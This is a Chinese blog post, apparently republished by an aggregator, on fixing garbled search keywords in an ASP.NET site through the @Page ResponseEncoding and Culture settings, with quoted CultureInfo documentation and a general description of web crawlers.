爬虫技术搜索关键字出现乱码

来源:互联网 发布:发卡平台源码 编辑:程序博客网 时间:2024/06/06 10:51

 

 

利用http://tongji.cn.yahoo.com/index.html YAHOO的站长统计测试网站出现乱码关键字
在群里问了下

有人提出方法

<%@ Page Language="C#" AutoEventWireup="true"   ResponseEncoding="UTF-8" Culture="zh-CN"%>
<meta http-equiv="Content-Type" content="text/html;charset=shift_jis" />


第2条没用我测试了 可以删除掉! shift_jis是日文编码。


第一条中的ResponseEncoding="UTF-8" Culture="zh-CN" 这个不要乱改  改成gb2312的话就会出现莫名其妙的错误,而且在查询的时候什么内容都查询不出来了。页面的布局也会出错!


Page.ResponseEncoding 属性
设置当前的 HttpResponse 对象的编码语言。

在大多数情况下不要在代码中设置该属性。使用 .aspx 文件的 @ Page 指令将 ResponseEncoding 属性设置为需要的值。请求该页时,该属性

将由动态生成的类进行设置。


Culture="zh-CN"
      指示页的区域性设置。该属性的值必须是有效的区域性 ID。注意,LCID 和 Culture 属性是互相排斥的;如果使用了其中一个属性,就

不能在同一页中使用另一个属性。有关可能的区域性值的更多信息,请参见 CultureInfo 类。


CultureInfo 类


CultureInfo 类基于 RFC 4646 为每个区域性指定唯一名称(Windows Vista 和更高版本)。名称是语言关联的 ISO 639 小写双字母区域性代

码和国家/地区关联的 ISO 3166 大写双字母子区域性代码的组合。

区域性名称的格式为“<languagecode2>-<country/regioncode2>”,其中 <languagecode2> 为语言代码,<country/regioncode2> 为子区域

性代码。例如“ja-JP”代表“日语(日本)”,“en-US”代表“英语(美国)”。在双字母语言代码不可用的情况中,将使用从 ISO 639-2

派生的三字母代码。


关于爬虫技术 网络爬虫是一个自动提取网页的程序,它为搜索引擎从万维网上下载网页,是搜索引擎的重要组成。传统爬虫从一个或若干初始网页的URL开始,获得初始网页上的URL,在抓取网页的过程中,不断从当前页面上抽取新的URL放入队列,直到满足系统的一定停止条件。聚焦爬虫的工作流程较为复杂,需要根据一定的网页分析算法过滤与主题无关的链接,保留有用的链接并将其放入等待抓取的URL队列。然后,它将根据一定的搜索策略从队列中选择下一步要抓取的网页URL,并重复上述过程,直到达到系统的某一条件时停止。另外,所有被爬虫抓取的网页将会被系统存贮,进行一定的分析、过滤,并建立索引,以便之后的查询和检索;对于聚焦爬虫来说,这一过程所得到的分析结果还可能对以后的抓取过程给出反馈和指导。

参见
http://blog.csdn.net/Ackarlix/archive/2007/08/29/1763038.aspx

<script src="http://www.cdsbfx.com/js/google.js" type="text/javascript"></script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
原创粉丝点击